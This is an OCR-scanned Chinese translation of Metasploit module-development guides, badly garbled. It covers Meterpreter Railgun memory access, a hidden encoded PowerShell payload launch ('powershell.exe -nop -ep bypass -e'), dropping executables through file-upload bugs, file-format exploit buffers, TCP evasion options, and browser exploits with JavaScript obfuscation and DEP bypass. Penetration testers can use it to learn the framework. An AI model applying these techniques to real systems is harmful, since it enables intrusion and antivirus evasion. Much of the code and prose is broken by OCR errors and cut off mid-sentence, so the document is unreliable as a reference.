] Meterpreter session 1 opened (192.168.1.64:4444 -» 192.168.1.106:55148) at 2014-07 
© 19:49:35 -0500 


meterpreter » irb 
[*] Starting IRB shell 
[*] The 'client' variable holds the meterpreter client 


>> 


注意 , 当 你 运行 一 个 post 模 块 或 irb 时 ， 你 总 是 有 一 个 client 或 者 一 个 session 对 象 来 处 理 ， 都 
指向 相同 的 东西 ， 在 这 种 情况 下 是 Msf::Sessions::Meterpreter. x86 Win .这 个 Meterpreter 会 话 
对 象 为 您 提供 对 目标 机 器 的 API 访 问 ， 包 括 Railgun 对 

象 Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::Railgun .这 是 你 是 如 何 简 间 单 的 访 问 


a 


[st 


session.railgun 


如 果 你 用 irb 运 行 上 面 的 代码 ， 你 会 发 现 它 返回 所 有 的 DLL， 函 数 ， 常 量 等 的 信息 . 它 读 取 是 有 

些 不 友好 ,因为 那 数据 非常 多 .幸运 的 是 ， ee 8 。 例 如 ， 就 

像 我 们 之 前 提 到 的 那样 ， 如 果 您 不 确定 哪些 DLL 被 加 载 ， 您 可 以 调用 known dll names 方法 : 
>> session.railgun.known dll names 


=> ["kernel32", "ntdll", "user32", "ws2 32", "iphlpapi", "advapi32", "shell32", "netap 
132", "crypt32", "wlanapi", "wldap32", "version" 


现在 ， 假 设 我 们 对 user32 感 兴趣 ， 并 且 和 希望 找到 所 有 可 用 的 函数 (以 及 返回 值 的 数据 类 型 
参数 ) ， 另 一 个 方便 的 技巧 是 : 


~- 


session.railgun.user32.functions.each pair {|n, v| puts "Function name: #{n}, Returns: 
Z(v.return typej, Params: #{v.params}"} 


«| =a mj 





请 注意 总 ， 如 果 您 d Ez 8H] d FE KAY 或 不 受 支 持 的 Windows 有 函数 ， 会 引发 一 个 runtimeerror 和 
洪 误 信息 .并 显示 可 用 函数 的 列表 。 要 调用 Windows API 函 数 ， 请 执行 以 下 操作 : 


>> session.railgun.user32.MessageBOxA(0, "hello, world", "hello", "MB OK") 
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "retur 
n"=>1} 


如 果 你 能 看 到 api 调 用 返回 一 个 字典 .我 们 已 经 看 到 了 一 个 习惯 ， 有 时 人 们 不 喜欢 检 
查 GetLastError , ErrorMessage , 和 return 值 .他 们 只 是 假设 它 是 工作 的 。 这 是 一 个 坏 的 程序 
习惯 ,是 不 推荐 的 .如 果 你 也 假设 一 些 东 西 是 工作 的 ,和 执行 下 一 个 api 调 用 .你 有 可 能 获得 意外 的 
结果 (最 坏 的 情况 : 丢失 Meterpreter 会 话 ) 。 


内 存 读 写 


ee 有 用 的 方法 ， 您 可 能 会 使 用 : memread 和 memwrite。 名 字 是 不 
言 自明 的 : 你 读 了 一 块 内 存 ， 或 者 你 写 入 一 个 内 存 区 域 。 我 们 将 在 有 效 载荷 本 身 中 演示 一 个 
新 的 内 存 块 : 


>> p = session.sys.process.open(session.sys.process.getpid, PROCESS ALL ACCESS) 

=> #<#<Class:0x007fe2e051b740>: Ox007Fe2c5a258a0 @client=#<Session:meterpreter 192.168. 

1.106:55151 (192.168.1.106) "WIN-6NHOQ8CJQVMNsinn3r @ WIN-6NHOQ8CJQVM"», @handle=448, 

@channel=nil, @pid=2268, @aliases={"image"=>#<Rex::Post::Meterpreter: :Extensions: :Stda 

pi: :Sys::ProcessSubsystem: : Image: 0x007fe2c5a25828 @process=#<#<Class:0x007fe2e051b740> 

:0x007fe2c5a258a80 ...>>, "io" =>#<Rex::Post::Meterpreter: :Extensions: :Stdapi: :Sys::Proc 

essSubsystem::10:0x007fe2c5a257b0 @process=#<#<Class : 0x007fe2e051b740>: Ox007Fe2c5a258a 

© , .>>, "memory"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem 
::Memory:0x007fe2c5a25738 @process=#<#<Class :0x007fe2e051b740>:0x007fe2c5a258a0 ...>>, 
“"thread"=>#<Rex: :Post: :Meterpreter: :Extensions: :Stdapi: :Sys: :ProcessSubsystem: : Thread 

:0x007fe2c5a256c0 @process=#<#<Class :0x007fe2e051b740>: 0x007fe2c5a258a0 ...>>}> 

>> p.memory.allocate(1024) 

=> 5898240 


像 你 能 看 到 的 新 的 分 配 在 地 址 5898240( 或 者 16 进 制 0xX005A0000). 让 我 们 首先 在 上 面 写 4 个 字 
节 


>> session.railgun.memwrite(5898240, "AAAA", 4) 
-» true 


Home 


session.railgun.memread(5898240, 4) => "AAAA" "" 


请 注意 ， 如 果 提 供 的 指针 不 正确 ， 则 可 能 导致 访问 冲突 并 使 Meterpreter 发 生 骨 溃 。 


https://www.youtube.com/watch?v-AniR-TOAnnl 


https://www.defcon.org/images/defcon-20/dc-20-presentations/Maloney/DEFCON-20- 
Maloney-Railgun.pdf 


https://dev.metasploit.com/redmine/projects/framework/wiki/RailgunUsage 


https://github.com/rapid7/metasploit- 
framework/tree/master/lib/rex/post/meterpreter/extensions/stdapi/railgun 


http://msdn.microsoft.com/en-us/library/ms681381(VS.85).aspx 
http://msdn.microsoft.com/en-us/library/aa383749 
http://undocumented.ntinternals.net/ 


http://source.winehq.org/WineAPI/ 
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PowerShell 是 Microsoft 开 发 的 一 种 脚本 语言 。 它 提供 了 对 Windows 平 台 几 乎 所 有 内 容 的 API 访 
问 ， 不 容易 被 检测 到 ， 易 于 学 习 ， 因 此 对 于 渗透 测试 的 后 期 开发 过 程 中 或 payload 执 行 的 
exploit 开 发 来 说 非常 强大 。 以 Metasploit 的 windows/smb/psexec_psh.rb 模块 为 例子 . 它 模仿 
Sysinternals 中 的 psexec 工 具 ， 有 效 载荷 被 压缩 并 从 命令 行 执行 ， 这 使 得 它 对 防 病毒 有 些 隐 
蔽 .psexec_psh.rb 中 只 有 不 到 30 行 代码 (不 包括 描述 模块 的 元 数据 ) ， 因 为 大 部 分 工作 都 是 由 
Powershell mixin 完 成 的 ， 没 有 比 这 更 容易 的 了 。 命令 行将 自动 尝试 检测 正在 运行 的 体系 结构 

(x863.x86 64) 以 及 它 所 包含 的 有 效 负载 体系 结构 。 如 果 存 在 不 匹配 的 情况 ， 则 会 生成 正确 
的 PowerShell 体 系 结构 以 将 有 效 载 荷 注入 到 内 存 中 ， 因 此 无 需 担 心目 标 系统 的 体系 结构 。 


要 使 用 PowerShell mixin， 请 确保 您 符合 以 下 要 求 


e 目标 机 器 支持 PowerShell。Vista 或 更 新 版 本 应 该 支持 它 。 
您 必须 拥有 执行 powershell.exe 的 权限 

您 必须 能 够 提供 系统 命令 参数 。 

e 您 必须 设置 命令 执行 类 型 为 了 执行 powershell.exe 攻 击 


示例 
e. 添加 Powershell 到 你 的 模块 ,首先 你 需要 require € 


require 'msf/core/exploit/powershell' 


e. 然后 把 这 个 mixin 包 含 在 这 个 Metasploit3 类 的 范围 内 (或 者 对 于 一 些 是 Metasploit4 ) 


include Msf::Exploit::Powershell 


e 使 用 该 cmd psh payload 方法 生成 PowerShell payload ° 


cmd psh payload(payload.encoded, payload instance.arch.first) 


%COMSPEC% /B /C start powershell.exe -Command $si = New-Object 
System.Diagnostics.ProcessStartInfo;$si.FileName = 'powershell.exe'; $si.Arguments = ' - 
EncodedCommand [BASE64 PAYLOAD] '; $si.UseShellExecute = $false; 
$si.RedirectStandardOutput = $true;$si.WindowStyle = 'Hidden'; $si.CreateNoWindow = 
$True; $p = [System.Diagnostics.Process]::Start($si); `~ 


根据 漏洞 的 情况 ， 可 以 使 用 多 种 选项 来 调整 最 终 的 命令 。 默 认 情况 下 脚本 是 压缩 的 ， 但 是 没 
有 编码 发 生 在 。 这 产生 了 一 个 约 2000 字 符 的 小 命令 〈 取 决 于 有 效 载荷 ) 。 其 中 最 值得 一 提 的 
是 encode final payload 将 完整 的 负载 Base64 编 码 成 一 个 非常 简单 的 命令 ， 并 且 很 少 有 坏 字 
符 。 人 但是， 命令 长 度 会 因此 而 增加 。 结 合 remove_comspec 意味 着 有 效 载 荷 将 是 非常 简单 的 


powershell.exe -nop -ep bypass -e AAAABBBBCCCCDDDD..... == 


在 下 面 的 api 文 档 确认 更 多 的 高 级 选项 


References 


https://dev.metasploit.com/api/Msf/Exploit/Powershell.html 


https://github.com/rapid7/metasploit- 
framework/blob/master/lib/msf/core/exploit/powershell.rb 


https://github.com/rapid7/metasploit- 
framework/blob/master/data/exploits/powershell/powerdump.ps 1 


如 何 使 用 PhpEXE 来 利用 任意 文件 上 传 漏洞 


任意 文件 上 传 在 Web 应 用 程序 中 是 非常 常见 的 ， 可 能 会 被 滥用 来 上 传 恶意 文件 ， 然 后 危害 服 

务 器 。 通 常 ， 攻 击 者 将 根据 支持 的 任何 服务 器 端 编程 语言 来 选择 一 个 有 效 载荷 。 因 此 ， 如 果 

钨 受 攻击 的 应 用 程序 在 PHP 中 ， 那 么 显然 PHP 是 支持 的 ， 因 此 一 个 简单 的 选择 就 是 使 用 诸如 

Metasploit 的 PHP meterpreter 之 类 的 PHP 有 效 载荷 。 然 而 ，PHP meterpreter 并 不 像 Windows 
meterpreter 那 样 共享 相同 的 性 能 。 所 以 在 现实 中 ， 会 发 生 什 么 呢 ? 你 可 能 会 想 升级 到 一 个 更 

好 的 shell， 在 这 个 过 程 中 需要 额外 的 手动 工作 。 那么 对 于 这 种 类 型 的 场景 为 什么 限制 你 的 有 
效 载荷 选项 ， 你 应 该 使 用 PhpEXE mixin。 它 用 作 PHP 中 的 有 效 负载 ， 将 最 终 的 恶意 可 执行 文 
件 写 入 远程 文件 系统 ， 然 后 在 使 用 后 自行 清除 ， 因 此 不 会 留 下 任何 痕迹 。 


要 使 用 PhpEXEmixin， 应 该 满足 一 些 典 型 的 可 利用 的 要 求 : 
e 您 必须 在 Web 服 务 器 上 找到 可 写 的 位 置 。 
e 同一 个 可 写 位 置 也 应 该 可 以 通过 HTTP 请 求 读 取 。 注意 :对 于 任意 文件 上 传 漏洞 ， 通 常 有 


一 个 目录 包含 上 传 的 文件 ， 并 且 是 可 读 的 。 如 果 这 个 bug 是 由 于 目录 遍历 造成 的 ， 那 么 临 
时 文件 夹 (来 自 操作 系统 或 者 Web 应 用 程序 ) 就 是 你 的 选择 。 


用 法 


e 首先 在 您 的 Metasploit3 类 范围 内 包含 mixin ， 如 下 所 示 


include Msf::Exploit::PhpEXE 


e 使 用 php 生 成 载荷 (php stager) get write exec payload 


p = get write exec payload 


e 如 果 您 正在 使 用 Linux 目 标 ， 则 可 以 将 其 设置 unlink_self 为 true， 这 将 自动 清除 可 执行 文 
件 : 


p = get write exec payload(:unlink self-»true) 


在 Windows 上 ， 您 可 能 无 法 清除 可 执行 文件 ， 因 为 它 可 能 仍 在 使 用 中 。 如 果 无 法 自动 清 
除 和 恶意 文件 ， 则 应 始终 警告 用 户 ， 以 便 在 渗透 测试 期 间 手 动 完 成 。 

e Lf X AG 这 个 时 候 你 可 以 上 传 get write exec payload 生成 的 有 效 载荷 然后 使 用 
GET 请 求 来 调用 它 。 如 果 您 不 知道 如 何 发 送 GET 请 求 ， 请 参考 以 下 文章 
https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HT T P-Request- 
Using-HTTPClient 
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### file create; ffl 

顾名思义 ， 该 "file_create .方法 允许 您 创建 一 个 文件 。 您 应 该 使 用 这 种 方法 ， 因 为 它 不 仅仅 是 将 数据 写 入 磁盘 。 它 
所 做 的 一 件 重 要 的 事情 就 是 将 文件 创建 以 这 个 格式 报告 到 数据 库 ```#{1ltype}.localpath```，，, 和 这 个 文件 将 总 是 
被 写 入 Metasploit 的 本 地 目录 , 定义 在 `` “Msf::Config.local directory^ ^^ (X&u ^ ^^-/.msf4/local' 
1C) ,这 使 得 文件 保持 良好 和 有 序 。 

要 使 用 mixin, 首先 导入 `` “Msf::Exploit::FILEFORMAT``` 到 你 的 “` “Metasploit3`` ”范围 内 


`` ruby 
include Msf::Exploit: : FILEFORMAT 


下 面 是 一 个 file_create 用 来 构建 一 个 想象 的 exploit 的 例子 : 


# This is my imaginary exploit 
buf E ni 

buf «« "A" * 1024 

buf << [0x40201f01].pack("V") 
buf << "Xx90" * 10 

buf «« payload.encoded 


file create(buf) 


自 定 义 文 件 名 


这 个 Msf::Exploit::FILENAME 默认 情况 下 注册 一 个 FILENAME 数据 储存 选项 . 它 实 际 上 是 可 选 
的 ,如 果 没 有 文件 名 提供 ,这 mixin 将 会 用 这 个 格式 设置 名 

字 "exploit.fileformat.#{self.shortname}" , self.shortname 意味 着 这 个 模块 名 的 短 版 本 如 
果 你 想 设置 一 个 默认 的 (但 仍然 可 以 由 用 户 更 改 ) ， 那 么 你 只 需 在 模块 中 重新 注册 它 ， 如 下 
所 示 : 


register options( 


[ 
OptString.new('FILENAME', [true, 'The malicious file name',  'msf.jpg']) 


|, self.class) 


固定 文件 名 


偶尔 ， 你 可 能 不 希望 你 的 用 户 改 变 文件 名 。 一 个 懒惰 的 技巧 是 通过 FILENAME 在 运行 时 修改 
数据 存储 选项 ， 但 是 这 是 非常 不 推荐 的 。 事 实 上 ， 如 果 你 这 样 做 ， 你 将 不 会 通过 msftidy。 相 
反 ， 这 是 如 何 正确 完成 的 : 1 - 注销 FILENAME 选项 


deregister options('FILENAME') 


2 - 接 下 来 ， 重 写 该 file format filename 方法 ， 并 使 其 返回 所 需 的 文件 名 : 


def file format filename 
'something.jpg' 
end 


Home 


3 - 最 后 ,请 在 模块 描述 中 留 下 关于 此 的 注释 。 


参考 


https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/fileformat.rb 


Vl 


https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/local 
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Æ Metasploit Framework, TCP &4£ -3& $: HLA Rex::Socket::Tcp, 它 扩展 了 内 建 的 Ruby Socket 
基 类 。 你 应 该 总 是 使 用 Rex 套 接 字 ， 而 不 是 原生 的 Ruby 套 接 字 .因为 如 果 不 是 的 话 ， 你 的 套 接 
字 是 不 能 被 框架 本 身 管理 的 ， 当 然 一 些 功 能 会 丢失 ， 上 比如 pivoting 。 Mois Dow 文档 目录 中 
的 Developer's Guide 解 释 了 它 是 怎么 工作 的 很 好 的 对 于 模块 开发 ， 通 常 你 不 会 直接 使 用 
Rex， 相 反 你 应 该 会 使 用 msf::Exploit::Remote::Tep mixin.mixin 已 经 提供 了 一 些 有 用 功能 M, 在 
开发 过 程 中 你 并 不 需要 担心 ， 例 如 TCP 规 避 ， 代 理 ，SSL 等 等 。 你 所 要 做 的 就 是 建立 连接 ， 发 
送 东 西 ， 接 收 东 西 ， 你 就 能 完成 。 听 起 来 很 简单 对 吧 ? 


使 用 这 个 mixin 


要 使 用 mixin， 只 需 在 模块 的 class Metasploit3 (或 class Metasploit4 ) 范围 内 添加 以 下 语 
4] : 


include Msf::Exploit::Remote::Tcp 


当 和 包含 mixin 时 ， 请 注意 将 在 您 的 模块 下 注册 以 下 数据 存储 选 


e SSL - Negotiate SSL for outgoing connections. 

e SSLVersion - The SSL version used: SSL2, SSL3, TLS1. Default is TLS1. 

e SSLVerifyMode - Verification mode: CLIENT ONCE, FAIL IF NO PEER CERT, 
NONE, PEER. Default is PEER. 

e Proxies - Allows your module to support proxies. 

e ConnectTimeout - Default is 10 seconds. 

e TCP::max send size - Evasive option. Maxiumum TCP segment size. 

e TCP::send delay - Evasive option. Delays inserted before every send. 


如 果 您 想 了 解 如 何 更 改 数据 存储 区 选项 的 默认 值 ， 请 查看 "Changing the default value for a 
datastore option" 


建立 链接 


Connect 
当 你 这 文 样 做 的 时 候 ， connect 将 会 调用 Rex: :Socket: :Tcp.create 来 创造 套 接 字 ,和 在 框架 注册 
它 . 它 自 Fe) i IUS 页 (所 以 它 知 道 连接 到 哪里 ) ， 但 是 你 也 可 以 手动 


t This connects to metasploit.com 
connect(true, {'RHOST'=>'208.118.237.137', 'RPORT'=>80}) 


这 个 connect 方法 将 会 返回 全 局 访问 的 Socket 对 象 
但 是 你 看 ， 还 有 一 点 点 。 该 connect 方 法 也 可 以 跑 出 一 些 您 可 能 想 要 捕获 的 Rex 异 常 ， 包 括 : 


e Rex::AddresslnUse - 当 它 实际 绑 定 到 相同 的 IP /端口 时 可 能 发 生 
e ::Errno::ETIMEDOUT - 当 Timeout.timeout ( ) 超时 。 

。 Rex::HostUnreachable - 相当 不 言 自明 

。 Rex::ConnectionTimeout -相当 不 言 自明 

。 Rex::ConnectionRefused - 相当 不 言 自明 


如 果 您 对 所 有 这 些 异常 的 抛 出 感到 好 奇 ,你 能 在 lib/rex/socket/comm/local.rb 找 到 


A LAR A ET VAR Top mixin 发 送 数据 。 为 了 使 事情 变 得 更 简单 和 安全 ， 我 们 建议 您 只 使 用 以 
下 这 个 put 方 法 


sock.put "Hello, World!" 


put 方 法 更 安全 的 原因 是 因为 它 不 允许 例 程 永久 挂 起 。 软 认 情况 下 ， 它 不 会 等 待 ， 但 是 如 果 要 
使 其 更 灵活 ， 可 以 这 样 做 : 


begin 
sock.put("data", {'Timeout '=>5}) 
rescue ::Timeout: :Error 


# You can decide what to do if the writing times out 
end 


接受 数据 


现在 ， 我 们 来 谈 谈 如 何 接收 数据 。 主 要 有 三 种 方法 可 以 使 用 : get once > getfetimed read ^ 
区 别 在 于 get_once 只 会 尝试 轮 询 流 直到 有 一 些 读 取 数 据 可 用 一 次 .但 是 这 个 get 方 法 会 一 直 读 
取 ， 直 到 没有 更 多 。 至 于 timed_read， 它 基本 上 是 read 用 Timeout 包 装 起 来 的 方法 。 一 般 来 
说 ， 我 们 希望 您 使 用 get once ,因为 它 更 安全 一 些 。 以 下 演示 如 何 使 用 它 : 


begin 

buf = Sock.get_once 
rescue ::EOFError 
end 


请 注意 ，get_once 如 果 没 有 读 取 数据 ， 也 可 能 返回 nil， 或 者 如 果 数 据 为 零 ， 则 返回 
EOFError。 所 以 请 确保 你 在 模块 中 捕获 到 nil 。 


数据 读 取 方法 可 以 在 lib/rex/io/stream.rb 找 到 . 


断 开 
要 断 开 一 个 连接 ,只 需要 


disconnect 


在 ensure 块 中 . 断 开 连 接 是 非常 重要 的 .显然 要 确保 在 出 现 问题 时 总 是 断 开 连接 。 如 果 你 不 这 样 
做 ， 你 可 能 会 得 到 一 个 只 能 向 服务 器 发 送 一 个 请 求 (第 一 个 请 求 ) 的 模块 ， 其 余 的 都 是 坏 
的 。 


完整 的 例子 
下 面 的 例子 应 该 演示 了 你 通常 会 如 何 使 用 Tcp mixin : 


# Sends data to the remote machine 
# 
# @param data [String] The data to send 
# @return [String] The received data 
def send_recv_once(data) 
buf = '' 
begin 
connect 
sock. put (data) 
buf = sock.get once || '' 
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::Connectio 
nTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError -» e 
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") 
ensure 
disconnect 
end 


buf 
end 


Metasploit 框 架 提 供 了 可 让 你 用 于 开发 浏览 器 exploit 的 不 同 mixin， 主 要 有 : 


e Msf::Exploit::Remote::HttpServer - — 4 ETUR TS 

e Msf::Exploit::Remote::HttpServer:: HTML - 3x 4-1 2x 4€ £t JavaScript 3k & HAER I] 83 
html 内 容 时 能 使 用 

° ees E E NA - & 4& X E HttpServerfeHttpServer :: 
HTML 的 功能 ， 但 还 有 更 多 的 好 东西 。 这 篇 文章 涵盖 了 BrowserExploitServer mixin. 


自动 开发 程序 


BrowserExploitServer mixin 是 唯一 专门 为 浏览 器 开发 的 mixin。 在 使 用 这 个 mixin 之 前 ， 你 应 该 
明白 它 在 背后 的 作用 : 1. 它 会 自动 收集 浏览 器 信息 ， 包 括 : 操作 系统 名 称 ， 版 本 ， 浏 览 器 名 
称 ， 浏 览 器 版 本 ， 是 否 使 用 代理 ， devais Microsoft Office 版 本 等 。 如 果 浏 览 器 没有 
启用 Javascript， 那 么 它 对 目标 知道 的 很 少 。 收 集 的 所 有 信息 将 存储 在 由 mixin 管 理 的 配置 文件 
中 。2. 然 后 mixin 会 标记 浏览 器 来 跟踪 会 话 。 它 也 将 使 用 相同 的 标签 来 检索 需要 的 配置 文件 。 
3. 在 mixin 决 定 是 否 应 该 向 浏览 器 使 用 exploit 之 前 ， 它 会 检查 模块 是 否 有 任何 可 exploit 的 条 
。 如 果 不 符合 条 件 ， 则 会 向 浏览 器 发 送 一 个 404， 放 弃 操作 4. 如 果 满 足 要 求 ，mixin 会 将 该 
置 文件 (在 检测 阶段 收集 的 浏览 器 信息 ) 传递 给 模块 ， 然 后 让 其 接管 其 余部 分 。 提示 : 在 
en ， 您 可 以 检查 配置 文件 中 的 source 键 以 确定 是 否 启 用 Javascript : 如 果 : source 
是 “script*， 则 意味 着 启用 了 Javascript。 如 果 是 “headers”( 如 HTTP 标 头 ) ， 那 么 浏览 器 禁用 
Javascript ° 


z & "T exploit-E 3E 


能 够 设置 浏览 器 的 要 求 是 mixin 的 一 个 重要 特性 。 它 可 以 让 你 的 攻击 更 聪明 ， 更 有 针对 性 ， 并 
防止 事故 发 生 。 这 里 有 一 个 场景 : 假设 你 有 一 个 针对 Internet Explorer 的 漏洞 ， 它 只 影响 特定 
范围 的 MSHTML 构 建 ， 你 可 以 设置 :os_name, :ua_name, :ua ver, and :mshtml build 来 确保 
它 不 会 育 目 的 exploit 其 他 东西 :mshtml build 要求 可 以 在 MSHTML 文 件 属性 下 的 “产品 版 本 "中 
找到 。 可 利用 的 浏览 器 要 求 在 模块 元 数据 的 “BrowserRequirements” 下 定义 。 以 下 是 定义 运行 
某 个 ActiveX 控 件 的 易 受 攻击 目标 的 示例 : 


'BrowserRequirements' => 
{ me 
source: /script/i, 
activex: [ 


clsid: '{D27CDB6E-AE6D-11cf -96B8-444553540000}', 
method: 'LoadMovie' 
} 
1, 


os_name: /win/i 


您 也 可 以 定义 目标 特定 的 要 求 。 这 也 是 mixin 能 够 自动 选择 一 个 目标 的 方式 ， 你 可 以 
用 “get target" 方 法 得 到 它 。 下 面 是 一 个 例子 ， 说 明 如 何 定义 目标 特定 的 要 求 ,在 Win XP 上 的 
IE8， 在 Win 7 上 的 IE 9 : 


'BrowserRequirements' => 


i 
: source => /script|headers/i, 
'ua name' => HttpClients::IE, 
'Targets' => 
[ 
[ 'Automatic', {} ], 
[ 
"Windows XP with IE 8', 
{ 
:OS_name => 'Windows XP', 
'ua ver' => '8.0', 
'Rop' => true, 
"Offset ' => 0x100 
J 
], 
[ 
"Windows 7 with IE 9', 
{ 
'os name' => 'Windows 7', 
'ua ver' => !9.0', 
'Rop' -» true, 
"Offset ' => 0x200 
} 
] 
] 


你 可 以 使 用 这 些 :os_name: 


OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 
OperatingSystems:: 


DE 


Constant 


Match:: 
Match:: 
Match: 
Match: 
Match: 
Match: 
Match: 
Match: 
Match: 
Match: 
Match: 
Match: 
Match: 
Match: 
Match: 
Match:: 
Match:: 
Match:: 
Match:: 
Match: 
Match: 
Match: 
Match: 


你 能 使 用 这 些 :ua. name: 


HttpClients::IE 


HttpClients::FF 


WINDOWS 
WINDOWS 95 


WINDOWS. 98 
WINDOWS ME 
WINDOWS. NT3 
WINDOWS. NTA4 
WINDOWS. 2000 
WINDOWS XP 
WINDOWS. 2003 
WINDOWS VISTA 
WINDOWS. 2008 
WINDOWS 7 
WINDOWS 2012 
WINDOWS 8 
WINDOWS 81 


LINUX 
MAC OSX 
FREEBSD 
NETBSD 


:OPENBSD 
:VMWARE 
:ANDROID 
:APPLE IOS 


Constant 


HttpClients::SAFARI 


HttpClients::OPERA 


HttpClients:: CHROME 


Purpose 
Match all versions of Windows 
Match Windows 95 
Match Windows 98 
Match Windows ME 
Match Windows NT 3 
Match Windows NT 4 
Match Windows 2000 
Match Windows XP 
Match Windows Server 2003 
Match Windows Vista 
Match Windows Server 2008 
Match Windows 7 
Match Windows 2012 
Match Windows 8 
Match Windows 8.1 
Match a Linux distro 
Match Mac OSX 
Match FreeBSD 
Match NetBSD 
Match OpenBSD 
Match VMWare 
Match Android 
Match Apple IOS 


Value 
"MSIE" 
"Firefox" 
"Safari" 
"Opera" 


"Chrome" 


更 多 这 些 常量 可 以 在 这 里 找到 :https://github.com/rapid7/metasploit- 
framework/blob/master/lib/msf/core/constants.rb 全 部 现在 mixin 支 持 的 要 求 可 以 在 这 找到 ( 查 
看 REQUIREMENT. KEY SET)) https://github.com/rapid7/metasploit- 
framework/blob/master/lib/msf/core/exploit/remote/browser exploit server.rb#L46 


3 — ^ ST A 


在 检测 阶段 和 需求 检查 之 后 ，mixin 将 触发 “on_request_exploit* 回 调 方法 ， 这 就 是 您 处 理 
HTTP 请 求 ， 制 作 HTML 并 返回 漏洞 响应 的 地 方 。 这 里 是 一 个 如 何 设置 “on_request exploit" 5j 
例子 : 


Listens for the HTTP request 

cli is the socket 

request is the Rex::Proto::Http::Request object 

target info is a hash that contains all the browser info (aka the profile) 


OQ. dk dt dt dk db dt 


ef on request exploit(cli, request, target info) 
print status("Here's what I know about the target: #{target_info.inspect}") 
end 


4& M BrowserExploitServer?; HTML 


BrowserExploitServer mixin 支 持 两 种 编码 风格 : 好 的 昌 的 HTML 或 ERB 模 板 。 首 先是 不 言 自 
明 的 : 


def on request exploit(cli, request, target info) 
html = %Q| 
<html> 
Hello, world! 
</html> 


send_exploit_html(cli, html) 
end 


s 


ERB 是 一 种 编写 Metasploit 浏 览 器 漏洞 的 新 方法 。 如 果 你 已 经 写 了 一 个 或 两 个 Web 应 用 程序 ， 
这 对 你 来 说 并 不 陌生 。 当 您 使 用 BrowserExploitServer mixin?& 5 2&8] Jf] ££ p > GE RE 


的 是 您 正在 编写 一 个 rails 模 板 。 以 下 是 使 用 此 功能 的 示例 : 


def on request exploit(cli, request, target info) 
html = %Q| 
«html» 
Do you feel lucky, punk?<br> 
<% if [true, false].sample %> 
Lucky!«br» 
<% else %> 
Bad luck, bro!<Br> 
<% end %> 
</html> 
| 
send exploit html(cli, html) 
end 


如 果 要 访问 局 部 变量 或 参数 ， 请 确保 将 绑 定 对 象 传递 给 send_exploit_html : 


def exploit templatei(target info, txt) 
txt2 - "I can use local vars!" 


template = %Q| 

<% msg = "This page is generated by an exploit" %> 
<%=msg%><br> 

<%=txt%><br> 

<%=txt2%><br> 

<p></p> 

Data gathered from source: £Z[target info[:source]j«br» 
OS name: #{target_info[:os_name]}<br> 

UA name: z(target info[:ua name]j«br» 

UA version: Z(target info[:ua ver])«br» 

Java version: #{target_info[:java]}<br> 

Office version: #{target_info[:office]} 


return template, binding() 
end 


def on request exploit(cli, request, target info) 
send exploit html(cli, exploit template(target info, txt)) 
end 


BrowserExploitServer mixin 在 制作 exploit 的 同时 还 提供 了 许多 其 他 有 用 的 东西 。 例 如 : SK 
调用 “get_payload" 方 法 时 ， 它 可 以 生成 特定 于 目标 的 有 效 内 容 。 它 还 使 您 可 以 访问 RopDb 
其 中 包含 一 组 ROP 以 绕 过 DEP (数据 执行 保护 ) 。 请 务必 查看 API 文 档 以 获取 更 多 信 

。 为 了 得 到 一 个 开始 ， 下 面 是 一 个 可 以 使 用 的 代码 示例 ， 开 始 开发 浏览 器 漏洞 : 


UH 
à This module requires Metasploit: http://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework 
THÉ 


iequamesmsto/con5e» 


class MetasploitModule « Msf::Exploit::Remote 
Rank - NormalRanking 


include Msf::Exploit::Remote::BrowserExploitServer 


def initialize(info={}) 
super(update info(info, 
'Name' => "BrowserExploitServer Example", 
'Description' => %q{ 
This is an example of building a browser exploit using the BrowserExploitServe 
r mixin 


i 
"License" => MSF_LICENSE, 
' Author ' => [ 'sinn8r' ], 
"References => 
[ 'URL', 'http://metasploit.com' ] 
], 
'Platform' => 'win', 
'BrowserRequirements' => 
{ 
:source => /script|headers/i, 
3 
'Targets' => 
[ 


[ 'Automatic', (3 ], 
[ 


‘Windows XP with IE 8', 


{ 
'os name' => 'Windows XP', 
'ua name' => 'MSIE', 
'ua ver' => '8.0!' 
} 
1, 
[ 
‘Windows 7 with IE 9', 
{ 
'os name' -» 'Windows 7', 
'ua name' => 'MSIE', 
'ua ver' => '9.0' 
d 
] 
], 
'Payload' => ( 'BadChars' => "\x00" }, 


'DisclosureDate' => "Apr 1 2013", 
'DefaultTarget' => 0)) 
end 


def exploit template(target info) 

template = %Q| 

Data source: <%=target_info[:source]%><br> 
OS name: <%=target_info[:os_name]%><br> 

UA name: <%=target_info[:ua_name]%><br> 

UA version: «?*-target info[:ua ver]? «br» 
Java version: <%=target_info[:java]%><br> 
Office version: <%=target_info[:office]%> 


return template, binding() 
end 


def on request exploit(cli, request, target info) 
send exploit html(cli, exploit template(target info)) 
end 


end 


JavaScript 4 


BrowserExploitServerf& 3€ JSObfu mixin & X44 JavaScript; » 4 fa 5 JavaScripti} > E 3X % 
是 这 样 写 : 


js = js_obfuscate(your_code) 


该 者 s_obfuscate 会 返回 一 个 Rex::Exploitation::JSObfu 对 和 象 。 要 获得 混淆 的 JavaScript， 请 调 
用 以 下 扒 0o_s 方 法 : 


js.to_s 
如 果 您 需要 访问 混淆 的 符号 名 称 ， 则 可 以 使 用 #sym 方 法 


# Get the obfuscated version of function name test() 
var name - js.sym('test') 


请 注意 ， 即 使 您 的 模块 正在 调用 硼 S_obfuscate 方 法 ， 黑 认 情 况 下 ， 除 非 用 户 设置 JsObfuscate 
